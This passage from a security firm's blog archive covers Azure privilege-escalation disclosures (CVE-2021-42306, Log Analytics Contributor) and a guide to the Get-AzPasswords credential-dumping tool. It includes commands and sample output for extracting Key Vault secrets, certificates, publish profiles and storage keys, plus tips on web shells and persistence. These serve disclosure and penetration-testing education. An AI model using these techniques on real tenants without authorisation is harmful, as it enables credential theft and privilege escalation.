As we can see, the results of Get-AzRoleAssignment for our App Registration shows that it has the Contributor role in the subscription.

As we can see, the results of Get-AzRoleAssignment for our App Registration shows that it has the Contributor role in the subscription.

Automating Extraction

Since we’re penetration testers and want to automate all our attacks, we wrote up a script to help identify additional instances of this issue in tenants. The PowerShell script uses the Graph API to gather the manifests from AAD and extract the credentials out to files.

The script itself is simple, but it uses the following logic:

  1. Get a token and query the following endpoint for App Registration information -  “https://graph.microsoft.com/v1.0/myorganization/applications/
  2. For each App Registration, check the “keyCredentials” value for data and write it to a file
  3. Use the Get-PfxData PowerShell function to validate that it’s a PFX file
  4. Delete any non-PFX files and log the display name and ID for affected App Registrations to a file for tracking

Impact

For the proof of concept that I submitted to MSRC for this vulnerability, I also created a new user (noaccess) in my AAD tenant. This user did not have any additional roles applied to it, and I was able to use the account to browse to the AAD menu in the Portal and view the manifest for the App Registration. 

For the proof of concept that I submitted to MSRC for this vulnerability, I also created a new user (noaccess) in my AAD tenant. This user did not have any additional roles applied to it, and I was able to use the account to browse to the AAD menu in the Portal and view the manifest for the App Registration.

By gaining access to the App Registration credential, my new user could then authenticate to the subscription as the Contributor role for the subscription. This is an impactful privilege escalation, as it would allow any user in this environment to escalate to Contributor of any subscription with an Automation Account.

For additional reference, Microsoft’s documentation for default user permissions indicates that this is expected behavior for all member users in AAD: https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/users-default-permissions.

Remediation Steps

Below is a detailed overview of how I remediated the issue in a client environment, prior to Microsoft’s fix:

When the “Run as” certificate has been renewed, the new certificate will have its own entry in the manifest. This value will be the public certificate of the new credential.

When the “Run as” certificate has been renewed, the new certificate will have its own entry in the manifest. This value will be the public certificate of the new credential.

One important remediation step to note here is the removal of the previous certificate. If the previous credential has not yet expired it will still be viable for authentication. To fully remediate the issue, the new certificate must be generated, and the old certificate will need to be removed from the App Registration.

To fully remediate the issue, the new certificate must be generated, and the old certificate will need to be removed from the App Registration.

Now that our example has been remediated, we can see that the new manifest value decodes to the public key for the certificate.

Now that our example has been remediated, we can see that the new manifest value decodes to the public key for the certificate.

I worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the issue. You can read Microsoft’s disclosure materials online here.

A representative from MSRC shared the following details with NetSPI regarding the remediation steps taken by Microsoft:

  • Impacted Azure services have deployed updates that prevent clear text private key data from being stored during application creation. 
  • Additionally, Azure Active Directory deployed an update that prevents access to private key data previously stored. 
  • Customers will be notified via Azure Service Health and should perform the mitigation steps specified in the notification to remediate any confirmed impacted Application and/or Service Principal.

Although Microsoft has updated the impacted Azure services, I recommend cycling any existing Automation Account "Run as" certificates. Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised.  

Summary

This was one of the fastest issues that I’ve seen go through the MSRC pipeline. I really appreciate the quick turnaround and open lines of communication that we had with the MSRC team. They were really great to work with on this issue.

Below is the timeline for the vulnerability:

  • 10/07/2021 – Initial report submitted to MSRC
  • 10/08/2021 – MSRC assigns a case number to the submission
  • October of 2021 – Back and forth emails and clarification with MSRC
  • 10/29/2021 – NetSPI confirms initial MSRC remediation
  • 11/17/2021 – Public Disclosure

While this was initially researched in a test environment, this issue was quickly escalated once we identified it in client environments. We want to extend special thanks to the clients that worked with us in identifying the issue in their environment and their willingness to let us do a spot check for an unknown vulnerability.

Looking for an Azure cloud pentesting partner? Connect with NetSPI: https://www.netspi.com/contact-us/

Addendum

NetSPI initially discovered this issue with Automation Account "Run as" certificates. MSRC's blog post details that two additional services were affected: Azure Migrate and Azure Site Recovery. These two services also create App Registrations in Azure Active Directory and were affected by the same issue which caused private keys to be stored in App Manifests. It is also possible that manually created Azure AD applications and Service Principals had private keys stored in the same manner.

We recommend taking the same remediation steps for any service principals associated with these services. Microsoft has published tooling to help identify and remediate the issue in each of these scenarios. Their guides and scripts are available here: https://github.com/microsoft/aad-app-credential-tools

[post_title] => CVE-2021-42306 CredManifest: App Registration Certificates Stored in Azure Active Directory [post_excerpt] => The vulnerability, found by NetSPI’s cloud pentesting practice director, Karl Fosaaen, affects any organization that uses Automation Account "Run as" accounts in Azure. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-cloud-vulnerability-credmanifest [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:45 [post_modified_gmt] => 2022-12-16 16:51:45 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26684 [menu_order] => 344 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [19] => WP_Post Object ( [ID] => 26468 [post_author] => 10 [post_date] => 2021-09-14 04:00:29 [post_date_gmt] => 2021-09-14 09:00:29 [post_content] =>

NetSPI Director Karl Fosaaen was featured in a CSO online article called 8 top cloud security certifications:

As companies move more and more of their infrastructure to the cloud, they're forced to shift their approach to security. The security controls you need to put in place for a cloud-based infrastructure are different from those for a traditional datacenter. There are also threats specific to a cloud environment. A mistake could put your data at risk.

It's no surprise that hiring managers are looking for candidates who can demonstrate their cloud security know-how—and a number of companies and organizations have come up with certifications to help candidates set themselves apart. As in many other areas of IT, these certs can help give your career a boost.

But which certification should you pursue? We spoke to a number of IT security pros to get their take on those that are the most widely accepted signals of high-quality candidates. These include cloud security certifications for both relative beginners and advanced practitioners.

Going beyond certifications

All of these certs are good ways to demonstrate your skills to your current or potential future employers — they're "a good way to get your foot in the door at a company doing cloud security and they're good for getting past a resume filter," says Karl Fosaaen, Cloud Practice Director at NetSPI. That said, they certainly aren't a be-all, end-all, and a resume with nothing but certifications on it will not impress anybody.

"Candidates need to be able to show an understanding of how the cloud components work and integrate with each other for a given platform," Fosaaen continues. "Many of the currently available certifications only require people to memorize terminology, so you don't have a guaranteed solid candidate if they simply have a certification. For those hiring on these certifications, make sure that you're going the extra level to make sure the candidates really do understand the cloud providers that your organization uses."

Fosaaen recommends pursuing specific trainings to further burnish your resume, such as the SANS Institute's Cloud Penetration Testing course, BHIS's Breaching The Cloud Perimeter, or his own company's Dark Side Ops Training. Concrete training courses like these can be a great complement to the "book learning" of a certification.

To learn more, read the full article here: https://www.csoonline.com/article/3631530/8-top-cloud-security-certifications.html

[post_title] => CSO: 8 top cloud security certifications [post_excerpt] => NetSPI Director Karl Fosaaen was featured in a CSO online article called 8 top cloud security certifications. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cso-8-top-cloud-security-certifications [to_ping] => [pinged] => [post_modified] => 2023-08-22 09:13:50 [post_modified_gmt] => 2023-08-22 14:13:50 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26468 [menu_order] => 360 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [20] => WP_Post Object ( [ID] => 11855 [post_author] => 10 [post_date] => 2021-09-13 10:00:00 [post_date_gmt] => 2021-09-13 15:00:00 [post_content] =>

TL;DR - This issue has already been fixed, but it was a fairly minor privilege escalation that allowed an Azure AD user to escalate from the Log Analytics Contributor role to a full Subscription Contributor role.

The Log Analytics Contributor Role is intended to be used for reading monitoring data and editing monitoring settings. These rights also include the ability to run extensions on Virtual Machines, read deployment templates, and access keys for Storage accounts.

Based off the role’s previous rights on the Automation Account service (Microsoft.Automation/automationAccounts/*), the role could have been used to escalate privileges to the Subscription Contributor role by modifying existing Automation Accounts that are configured with a Run As account. This issue was reported to Microsoft in 2020 and has since been remediated.

Escalating Azure Permissions

Automation Account Run As accounts are initially configured with Contributor rights on the subscription. Because of this, an attacker with access to the Log Analytics Contributor role could create a new runbook in an existing Automation Account and execute code from the runbook as a Contributor on the subscription.

These Contributor rights would have allowed the attacker to create new resources on the subscription and modify existing resources. This includes Key Vault resources, where the attacker could add their account to the access policies for the vault, granting themselves access to the keys and secrets stored in the vault.

Finally, by exporting the Run As certificate from the Automation Account, an attacker would be able to create a persistent Az (CLI or PowerShell module) login as a subscription Contributor (the Run As account).

Since this issue has already been remediated, we will show how we went about explaining the issue in our Microsoft Security Response Center (MSRC) submission.

Attack Walkthrough

Using an account with the Owner role applied to the subscription (kfosaaen), we created a new Automation Account (LAC-Contributor) with the “Create Azure Run As account” option set to “Yes”. We need to be an Owner on the subscription to create this account, as contributors do not have rights to add the Run As account.

Add Automation Account

Note that the Run As account (LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=) was added to the Azure tenant and is now listed in the subscription IAM tab as a Contributor.

Access Control

In the subscription IAM tab, we assigned the “Log Analytics Contributor” role to an Azure Active Directory user (LogAnalyticsContributor) with no other roles or permissions assigned to the user at the tenant level.

Role added

On a system with the Az PowerShell module installed, we opened a PowerShell console and logged in to the subscription with the Log Analytics Contributor user and the Connect-AzAccount function.

PS C:\temp> Connect-AzAccount
 
Account SubscriptionName TenantId Environment
------- ---------------- -------- -----------
LogAnalyticsContributor kfosaaen 6[REDACTED]2 AzureCloud

Next, we downloaded the MicroBurst tools and imported the module into the PowerShell session.

PS C:\temp> import-module C:\temp\MicroBurst\MicroBurst.psm1
Imported AzureAD MicroBurst functions
Imported MSOnline MicroBurst functions
Imported Misc MicroBurst functions
Imported Azure REST API MicroBurst functions

Using the Get-AZPasswords function in MicroBurst, we collected the Automation Account credentials. This function created a new runbook (iEhLnPSpuysHOZU) in the existing Automation Account that exported the Run As account certificate for the Automation Account.

PS C:\temp> Get-AzPasswords -Verbose 
VERBOSE: Logged In as LogAnalyticsContributor@[REDACTED]
VERBOSE: Getting List of Azure Automation Accounts...
VERBOSE: Getting the RunAs certificate for LAC-Contributor using the iEhLnPSpuysHOZU.ps1 Runbook
VERBOSE: Waiting for the automation job to complete
VERBOSE: Run AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account
VERBOSE: Removing iEhLnPSpuysHOZU runbook from LAC-Contributor Automation Account
VERBOSE: Password Dumping Activities Have Completed

We then used the MicroBurst created script (AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1) to authenticate to the Az PowerShell module as the Run As account for the Automation Account. As we can see in the output below, the account we authenticated as (Client ID - d0c0fac3-13d0-4884-ad72-f7b5439c1271) is the “LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=” account and it has the Contributor role on the subscription.

PS C:\temp> .\AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1
PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My
Thumbprint Subject
---------- -------
A0EA38508EEDB78A68B9B0319ED7A311605FF6BB DC=LAC-Contributor_test_7a[REDACTED]b5
Environments : {[AzureChinaCloud, AzureChinaCloud], [AzureCloud, AzureCloud], [AzureGermanCloud, AzureGermanCloud],
[AzureUSGovernment, AzureUSGovernment]}
Context : Microsoft.Azure.Commands.Profile.Models.Core.PSAzureContext

PS C:\temp> Get-AzContext | select Account,Tenant
Account Subscription
------- ------
d0c0fac3-13d0-4884-ad72-f7b5439c1271 7a[REDACTED]b5
PS C:\temp> Get-AzRoleAssignment -ObjectId bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
RoleAssignmentId : /subscriptions/7a[REDACTED]b5/providers/Microsoft.Authorization/roleAssignments/0eb7b73b-39e0-44f5-89fa-d88efc5fe352
Scope : /subscriptions/7a[REDACTED]b5
DisplayName : LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=
SignInName :
RoleDefinitionName : Contributor
RoleDefinitionId : b24988ac-6180-42a0-ab88-20f7382dd24c
ObjectId : bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
ObjectType : ServicePrincipal
CanDelegate : False
Description :
ConditionVersion :
Condition :
LAC Contributor

MSRC Submission Timeline

Microsoft was great to work with on the submission and they were quick to respond to the issue. They have since removed the Automation Accounts permissions from the affected role and updated documentation to reflect the issue.

Custom Azure Automation Contributor Role

Here’s a general timeline of the MSRC reporting process:

  • NetSPI initially reports the issue to Microsoft – 10/15/20
  • MSRC Case 61630 created – 10/19/20
  • Follow up email sent to MSRC – 12/10/20
  • MSRC confirms the behavior is a vulnerability and should be fixed – 12/11/20
  • Multiple back and forth emails to determine disclosure timelines – March-July 2021
  • Microsoft updates the role documentation to address the issue – July 2021
  • NetSPI does initial public disclosure via DEF CON Cloud Village talk – August 2021
  • Microsoft removes Automation Account permissions from the LAC Role – August 2021

Postscript

While this blog doesn’t address how to escalate up from the Log Analytics Contributor role, there are many ways to pivot from the role. Here are some of its other permissions: 

                "actions": [
                    "*/read",
                    "Microsoft.ClassicCompute/virtualMachines/extensions/*",
                    "Microsoft.ClassicStorage/storageAccounts/listKeys/action",
                    "Microsoft.Compute/virtualMachines/extensions/*",
                    "Microsoft.HybridCompute/machines/extensions/write",
                    "Microsoft.Insights/alertRules/*",
                    "Microsoft.Insights/diagnosticSettings/*",
                    "Microsoft.OperationalInsights/*",
                    "Microsoft.OperationsManagement/*",
                    "Microsoft.Resources/deployments/*",
                    "Microsoft.Resources/subscriptions/resourcegroups/deployments/*",
                    "Microsoft.Storage/storageAccounts/listKeys/action",
                    "Microsoft.Support/*"
                ]

More specifically, this role can pivot to Virtual Machines via Custom Script Extensions and list out Storage Account keys. You may be able to make use of a Managed Identity on a VM, or find something interesting in the Storage Account.

Looking for an Azure pentesting partner? Consider NetSPI.

[post_title] => Escalating Azure Privileges with the Log Analytics Contributor Role [post_excerpt] => Learn how cloud pentesting expert Karl Fosaaen found and reported a Microsoft Azure vulnerability that allowed an Azure AD user to escalate from the Log Analytics Contributor role to the full Subscription Contributor role. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => escalating-azure-privileges-with-the-log-analystics-contributor-role [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:24:10 [post_modified_gmt] => 2023-03-16 14:24:10 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11855 [menu_order] => 361 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [21] => WP_Post Object ( [ID] => 26141 [post_author] => 53 [post_date] => 2021-08-13 15:12:35 [post_date_gmt] => 2021-08-13 20:12:35 [post_content] =>
Watch Now

Whether it's the migration of legacy systems or the creation of brand-new applications, many organizations are turning to Microsoft’s Azure cloud as their platform of choice. This brings new challenges for penetration testers who are less familiar with the platform, and now have more attack surfaces to exploit. In an attempt to automate some of the common Azure escalation tasks, the MicroBurst toolkit was created to contain tools for attacking different layers of an Azure tenant. In this talk, we will be focusing on the password extraction functionality included in MicroBurst. We will review many of the places that passwords can hide in Azure, and the ways to manually extract them. For convenience, we will also show how the Get-AzPasswords function can be used to automate the extraction of credentials from an Azure tenant. Finally, we will review a case study on how this tool was recently used to find a critical issue in the Azure permissions model that resulted in a fix from Microsoft.

[wonderplugin_video iframe="https://youtu.be/m1xxLZVtSz0" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Azure Pentesting: Extracting All the Azure Passwords [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-pentesting-extracting-all-the-azure-passwords [to_ping] => [pinged] => [post_modified] => 2023-06-22 20:06:04 [post_modified_gmt] => 2023-06-23 01:06:04 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=26141 [menu_order] => 52 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [22] => WP_Post Object ( [ID] => 11753 [post_author] => 10 [post_date] => 2020-10-22 07:00:26 [post_date_gmt] => 2020-10-22 07:00:26 [post_content] =>

It has been a while since the initial release (August 2018) of the Get-AzurePasswords module within MicroBurst, so I figured it was time to do an overview post that explains how to use each option within the tool. Since each targeted service in the script has a different way of getting credentials, I want users of the tool to really understand how things are working.

For those that just want to jump to information on specific services, here's links to each section:

Additionally, we've renamed the function to Get-AzPasswords to match the PowerShell modules that we're using in the function.

AzureRM Versus Az

As of March 19, 2020, we pushed some changes to MicroBurst to switch the cmdlets over to the Az PowerShell modules (from AzureRM). This was a much needed switch, as the AzureRM modules are being replace by the Az modules.

Along with these updates I also wanted to make some additions to the Get-AzurePasswords functionality. Since we reorganized all of the code in MicroBurst to match up with the related supporting modules (Az, AzureAD, MSOL, etc.), we thought it was important to separate out function names based off of the modules the script was using.

Modules

Going forward, Get-AzurePasswords will still live in the AzureRM folder in MicroBurst, but it will not be updated with any new functionality. Going forward, I highly recommend that everyone switches over to the newly renamed version "Get-AzPasswords" in the Az folder in MicroBurst.

Important Script Usage Note - Some of these functions can make minor temporary changes to an Azure subscription (see Automation Accounts). If you Ctrl+C during the script execution, you may end up with unintended files or changes in your subscription.

I'll cover each of these concerns in the sections below, but have patience when running these functions. I know Azure can have its slow moments, so (in most cases) just give the script a moment to catch up and everything should be good. I haven't been keeping track, but I believe I've lost several months of time waiting for automation runbook jobs to complete.

Function Usage

For each service section, I've noted the script flag that you can use to toggle ("-Keys Y" versus "-Keys N") the collection of that specific service. Running the script with no flags will gather credentials from all services.

Step 1. Import the MicroBurst Module

PS C:\MicroBurst> Import-Module .MicroBurst.psm1
Imported Az MicroBurst functions
Imported AzureAD MicroBurst functions
Imported MSOnline MicroBurst functions
Imported Misc MicroBurst functions
Imported Azure REST API MicroBurst functions

Step 2. Authenticate to the Azure Tenant

PS C:\MicroBurst> Login-AzAccount

Account           SubscriptionName  TenantId                             Environment
-------           ----------------  --------                             -----------
test@example.com  TestSubscription  4712345a-6543-b5s4-a2b2-e01234567895 AzureCloud

Step 3. Gather Passwords

PS C:\MicroBurst> Get-AzPasswords -Verbose
VERBOSE: Logged In as test@example.com
VERBOSE: Getting List of Key Vaults...
VERBOSE:  Exporting items from testingKeys
VERBOSE:   Getting Key value for the testKey Key
VERBOSE:   Getting Secret value for the TestKey Secret
VERBOSE: Getting List of Azure App Services...
VERBOSE:  Profile available for microburst-application
VERBOSE: Getting List of Azure Container Registries...
VERBOSE: Getting List of Storage Accounts...
VERBOSE:  Getting the Storage Account keys for the teststorage account
VERBOSE: Getting List of Azure Automation Accounts...
VERBOSE:  Getting the RunAs certificate for autoadmin using the XZvOYzsuBiGbfqe.ps1 Runbook
VERBOSE:   Waiting for the automation job to complete
VERBOSE:    Run AuthenticateAs-autoadmin-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account
VERBOSE:   Removing XZvOYzsuBiGbfqe runbook from autoadmin Automation Account
VERBOSE:  Getting cleartext credentials for the autoadmin Automation Account
VERBOSE:   Getting cleartext credentials for test using the dOFtWgEXIQLlRfv.ps1 Runbook
VERBOSE:    Waiting for the automation job to complete
VERBOSE:    Removing dOFtWgEXIQLlRfv runbook from autoadmin Automation Account
VERBOSE: Password Dumping Activities Have Completed

*Running this will "Out-GridView" prompt you to select the subscription(s) to gather credentials from.

For easier output management, I'd recommend piping the output to either "Out-GridView" or "Export-CSV".

With that housekeeping out of the way, let's dive into the credentials that we're able to gather with Get-AzPasswords.

Key Vaults (-Keys Y)

Azure Key Vaults are Microsoft’s solution for storing sensitive data (Keys, Passwords/Secrets, Certs) in the Azure cloud. Inherently, Key Vaults are great sources for finding credential data. If you have a user with the correct rights, you should be able to read data out of the key stores.

Vault access is controlled by the Access Policies in each vault, but any users with Contributor rights are able to give themselves access to a Key Vault. Get-AzPasswords will not modify any Key Vault Access Policies, but you could give your account read permissions on the vault if you really needed to read a key.

An example Key Vault Secret:

Keyvault

Get-AzPasswords will export all of the secrets in cleartext, along with any certificates. You also have the option to save the certificate files locally with the "-ExportCerts Y" flag.

Sample Output:

Type : Key
Name : DiskKey
Username : N/A
Value : {"kid":"https://notArealVault.vault.azure.net/keys/DiskKey/63abcdefghijklmnop39","kty ":"RSA","key_ops":["sign","verify","wrapKey","unwrapKey","encrypt","decrypt"],"n":"v[REDACTED]w","e":"AQAB"}
PublishURL : N/A
Created : 5/19/2020 5:20:12 PM
Updated : 5/19/2020 5:20:12 PM
Enabled : True
Content Type : N/A
Vault : notArealVault
Subscription : NotARealSubscription

Type : Secret
Name : TestKey
Username : N/A
Value : Karl'sPassword
PublishURL : N/A
Created : 3/7/2019 9:28:37 PM
Updated : 3/7/2019 9:28:37 PM
Enabled : True
Content Type : Password
Vault : notArealVault
Subscription : NotARealSubscription

Finally, access to the Key Vaults may be restricted by network, so you may need to run this from an Azure VM on the subscription, or from an IP in the approved "Private endpoint and selected networks" list. These settings can be found under the Networking tab in the Azure portal.

Alternatively, you may need to use an automation account "Run As" account to request the keys. Steps to complete that process are outlined here.

App Services (-AppServices Y)

Azure App Services are Microsoft’s option for rapid application deployment. Applications can be spun up quickly using app services and the configurations (passwords) are pushed to the applications via the App Services profiles.

In the portal, the App Services deployment passwords are typically found in the “Publish Profile” link that can be found in the top navigation bar within the App Services section. Any user with contributor rights to the application should be able to access this profile.

Appservices

These publish profiles will contain Web and FTP credentials that can be used to get access to the App Service's files. In addition to that, any stored connection strings should also be available in the file. All available profile credentials are all parsed by Get-AzPasswords, so it's easy to gather credentials for multiple App Services applications at once.

Sample Output:

Type         : AppServiceConfig
Name         : appServicesApplication - Web Deploy
Username     : $appServicesApplication
Value        : dS[REDACTED]jM
PublishURL   : appServicesApplication.scm.azurewebsites.net:443
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Password
Vault        : N/A
Subscription : NotARealSubscription

Type         : AppServiceConfig
Name         : appServicesApplication - FTP
Username     : appServicesApplication$appServicesApplication
Value        : dS[REDACTED]jM
PublishURL   : ftp://appServicesApplication.ftp.azurewebsites.windows.net/site/wwwroot
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Password
Vault        : N/A
Subscription : NotARealSubscription

Type : AppServiceConfig
Name : appServicesApplication-Custom-ConnectionString
Username : N/A
Value : metadata=res://*/Models.appServicesApplication.csdl|res://*/Models.appServicesApplication.ssdl|res://*/Models.appServicesApplication.msl;provider=System.Data.SqlClient;provider connection string="Data Source=abcde.database.windows.net;Initial Catalog=app_Enterprise_Prod;Persist Security Info=True;User ID=psqladmin;Password=somepassword9" 
PublishURL : N/A
Created : N/A
Updated : N/A
Enabled : N/A
Content Type : ConnectionString
Vault : N/A
Subscription : NotARealSubscription

Potential next steps for App Services have been outlined in another NetSPI blog post here.

Automation Accounts (-AutomationAccounts Y)

Automation Accounts are one of the ways that you can automate jobs and routine tasks within Azure. These tasks (Runbooks) are frequently run with stored credentials, or with the service account (Run As "Connections") tied to the Automation Account.

Automation

Both of these credential types can be returned with Get-AzPasswords and can potentially allow for privilege escalation. In order to gather these credentials from the Automation Accounts, we need to create new runbooks that will cast the credentials out to variables that are then printed to the runbook job output.

To protect these credentials in the output, we've implemented an encryption scheme in Get-AzPasswords that encrypts the job output.

Enccreds

The Run As certificates (covered in another blog) can then be used to authenticate (run the AuthenticateAs PS1 script) from your testing system as the stored Run As connection.

Authas

Any stored credentials may have a variety of uses, but I've frequently seen domain accounts being stored here, so that can lead to some interesting lateral movement options.

Sample Output:

Type : Azure Automation Account
Name : kfosaaen
Username : test
Value : testPassword
PublishURL : N/A
Created : N/A
Updated : N/A
Enabled : N/A
Content Type : Password
Vault : N/A
Subscription : NotARealSubscription

As a secondary note here, you can also request bearer tokens for the Run As automation accounts from a custom runbook. I cover the process in this blog post, but I think it's worth noting here, since it's not included in Get-AzPasswords, but it is an additional way to get a credential from an Automation Account.

And one final note on gathering credentials from Automation Accounts. It was noted above, but sometimes Azure Automation Accounts can be slow to respond. If you're having issues getting a runbook to run and cancel the function execution before it completes, you will need to manually go in and clean up the runbooks that were created as part of the function execution.

Runbook

These will always be named with a 15-character random string of letters (IE: lwVSNvWYpPXCcDd). You will also have local files in your execution directory to clean up as well, and they will have the same name as the ones that were uploaded for execution.

Storage Account Keys (-StorageAccounts Y)

Storage Accounts are the multipurpose (Public/Private files, tables, queues) service for storing data in an Azure subscription. This section is pretty simple compared to the previous ones, but gathering the account keys is an easy way to maintain persistence in a sensitive data store. These keys can be used with the Azure storage explorer application to remotely mount storage accounts.

Storage

These access keys can easily be cycled, but if you're looking for persistence in a Storage Account, these would be your best bet. Additionally, if you're modifying Cloud Shell files for escalation/persistence, I'd recommend holding on to a copy of these keys for any Cloud Shell storage accounts.

Sample Output:

Type         : Storage Account
Name         : notArealStorageAccount
Username     : key1
Value        : W84[REDACTED]==
PublishURL   : N/A
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Key
Vault        : N/A
Subscription : NotARealSubscription

Azure Container Registries (-ACR Y)

Azure Container Registries are used in Azure to manage Docker images for use within Azure Kubernetes Service (AKS) or as container instances (either in Azure or elsewhere). More often than not, we will find keys and credentials stored in these container images.

In order to authenticate to the repositories, you can either use the AZ CLI with AzureAD credentials, or there can be an "Admin user". If you have AzureAD user rights to pull the admin password for a container registry, you should already have rights to authenticate to the repositories with the AZ CLI, but if an Admin user is enabled for the registry, this user could then be used for persistence when you lose access to the initial AzureAD user.

Container

Fun Fact - Any AzureAD user with "Reader" permissions on the Container Registry is able to connect to the repositories and pull images down with Docker.

For more information on using these credentials, here's another NetSPI blog.

Conclusion

There was a lot of ground to cover here, but hopefully this does a good job of explaining all of the functionality available in Get-AzPasswords. It's worth noting that most of this functionality relies on your AzureAD user having Contributor IAM rights on the applicable service. While some may argue that Contributor access is equivalent to admin in a subscription, I would argue that most subscriptions primarily consist of Contributor users.

If there are any sources for Azure passwords that you would like to see added to Get-AzPasswords, feel free to make a pull request on the MicroBurst GitHub repository.

[post_title] => A Beginners Guide to Gathering Azure Passwords [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => a-beginners-guide-to-gathering-azure-passwords [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:26:00 [post_modified_gmt] => 2023-03-16 14:26:00 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11753 [menu_order] => 452 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [23] => WP_Post Object ( [ID] => 11728 [post_author] => 10 [post_date] => 2020-08-17 07:00:59 [post_date_gmt] => 2020-08-17 07:00:59 [post_content] =>

We test a lot of web applications at NetSPI, and as everyone continues to move their operations into the cloud, we're running into more instances of applications being run on Azure App Services.

Top

Whenever we run into an App Services application with a serious vulnerability, I'll frequently get a ping asking about next steps to take in an Azure environment. This blog will hopefully answer some of those questions.

Initial Access

We will be primarily talking about command execution on an App Services host. There are plenty of other vulnerabilities (SQLi, SSRF, etc.) that we could put into the context of Azure App Services, but we'll save those for another blog.

For our command injection examples, we'll assume that you've used one of the following methods to execute commands on a system:

  • An uploaded web shell
  • Unintended CMD injection via an application issue
  • Intended CMD Injection through application functionality

Alternatively, keep in mind that Azure Portal Access (with an account with Contributor rights on an app) also allows you to run commands from the App Services Console. This will be important if there's a higher privileged Managed Identity in use by the app, and we want to use this to escalate Azure permissions.

Cmdsql

For the sake of simplicity, we'll also assume that this is a relatively clean command injection (See Web Shell), where you can easily see the results of your commands. If we want to get really complicated, we could talk about using side channels to exfiltrate command results, but that's also for another blog.

Azure "App Services"

To further complicate matters, Azure App Services encompasses "Function Apps" and "App Service Apps". There are some key differences between the two, but for the purposes of this blog, we'll consider them to be the same. Additionally, there are Linux and Windows options for both, so we'll try to cover options for those as well.

If you want to follow along with your own existing App Services app, you can use the Console (or SSH) section in the Development Tools section of the Azure Portal for your App Services app.

Appservices

Choose Your Own Adventure

With command execution on the App Services host, there are a couple of paths that you can take:

Looking Locally

First things first, this is an application server, so you might want to look at the application files.

  • The application source code files can (typically) be found at the %DEPLOYMENT_SOURCE%
  • The actual working files for the application can (typically) be found at %DEPLOYMENT_TARGET%
  • Or /home/site/wwwroot if you're working with a Linux system
Locally

If you're operating on a bare bones shell at this point, I would recommend pulling down an appropriate web shell to your %DEPLOYMENT_TARGET% (or /home/site/wwwroot) directory. This will allow you to upgrade your shell and allow you to better explore the host.

Just remember, this app server is likely facing the internet and a web shell without a password easily becomes someone else's web shell.

Within the source code files, you can also look for common application configuration files (web.config, etc.) that might contain additional secrets that you could use to pivot through to other services (as we'll see later in the blog).

Looking at the Environment

On an App Services host, most of your configuration variables will be available as environmental variables on the host. These variables will most likely contain keys that we can use to pivot to other Azure services in the subscription.

Since you're most likely to have a cmd.exe shell, you can just use the "set" command to list out all of the environmental variables. It will look like this (without the redactions):

Env Win

If you're using PowerShell for your command execution, you can use the "dir env: | ft -Wrap " command to do the same. Make sure that you're piping to "ft -wrap" as that will allow the full text values to be returned without being truncated.

Alternatively, if you're in a Linux shell, you can use the "printenv" command to accomplish the same:

Env Linux

Now that we (hopefully) have some connection strings for Azure services, we can start getting into other services.

Accessing Storage Accounts

If you're able to find an Azure Storage Account connection string, you should be able to remotely mount that storage account with the Azure Storage Explorer.

Here are a couple of common Windows environmental variables that hold those connection strings:

  • APPSETTING_AzureWebJobsStorage
  • APPSETTING_WEBSITE_CONTENTAZUREFILECONNECTIONSTRING
  • AzureWebJobsStorage
  • WEBSITE_CONTENTAZUREFILECONNECTIONSTRING

Additionally, you may find these strings in the application configuration files. Keep an eye out for any config files containing "core.windows.net", storage, blob, or file in them.

Using the Azure Storage Explorer, copy the Storage Account connection string and use that to add a new Storage Account.

Storage

Now that you have access to the Storage Account, you should be able to see any files that the application has rights to.

Storage


Accessing Azure SQL Databases

